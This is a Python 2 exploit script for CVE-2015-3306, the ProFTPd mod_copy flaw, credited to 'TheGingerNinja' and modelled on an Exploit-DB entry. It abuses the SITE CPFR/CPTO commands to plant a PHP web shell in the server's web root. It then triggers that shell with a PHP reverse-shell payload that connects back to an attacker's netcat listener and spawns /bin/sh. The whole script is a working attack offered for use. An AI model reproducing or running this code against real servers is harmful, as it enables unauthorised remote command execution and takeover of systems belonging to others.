#!/usr/bin/env python

import sys, socket, urllib, requests

# Exploit Title: ProFTPd 1.3.4 mod_copy RCE
# Date: 2019-11-26
# Exploit Author: TheGingerNinja
# Software: ProFTPd 1.3.5 with mod_copy
# Version: 1.3.4
# Tested on: Ubuntu 15.10
# CVE : 2015-3306
# Language : Python 2
#
# Non Metasploit exploit of CVE-2015-3306
# Follows pattern of: https://www.exploit-db.com/exploits/37262
#
# Usage:
#     python exploit_proftd_1_3_5.py RHOST SITEPATH LHOST LPORT
#
# RHOST:
#     IP of machine with ProFTP 1.3.5 running
#
# SITEPATH:
#     The http server home address is needed:
#     e.g. /var/www, /var/www/html
#
# LHOST:
#     Attacking machine IP with netcat listening
#     e.g 1.2.3.4
#
# LPORT:
#     Port that Netcat is listening on
#     e.g. 80

def check_response(soc, check_str, exit_message):
    ftp_response = soc.recv(1024)
    if check_str not in ftp_response:
        print("[-] " + exit_message)
        s.close()
        sys.exit()


# Check and gather command line args
if len(sys.argv) < 5:
    print("\nUsage: python " + sys.argv[0] + " <RHOST> <SITEPATH> <LHOST> <LPORT>\n")
    sys.exit()
rhost = sys.argv[1]
sitepath = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]

print("[+] REMINDER: Start a Netcat listener on port: " + lport)
print("[+] Running exploit for ProFTPd 1.3.5...")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 21))

ftp_banner = s.recv(1024)
print("[+] FTP Banner: " + ftp_banner)

print("[+] Sending exploit...")
s.send("SITE CPFR /proc/self/cmdline\r\n")
check_response(s, "350", "Copy from /proc/self/cmdline failed!")

s.send("SITE CPTO /tmp/.<?php passthru($_GET[\'banana\']);?>\r\n")
check_response(s, "250", "Failed copy to temporary payload!")

s.send("SITE CPFR /tmp/.<?php passthru($_GET[\'banana\']);?>\r\n")
check_response(s, "350", "Failed copying from temporary payload!")

s.send("SITE CPTO " + sitepath + "/pealthe.php\r\n")
check_response(s, "250", "Failed to copy PHP payload to website home path!")

payload = "nohup php -r '$sock=fsockopen(\"" + lhost + "\"," + lport +");exec(\"/bin/sh -i <&3 >&3 2>&3\");' & "
encoded_payload = urllib.quote(payload)

print("[+] Running payload by requesting: http://" + rhost + "/pealthe.php?banana=" + encoded_payload)
requests.get("http://" + rhost + "/pealthe.php?banana=" + encoded_payload)

print("[+] Thank you for using this exploit. Now go bananas!")

s.close()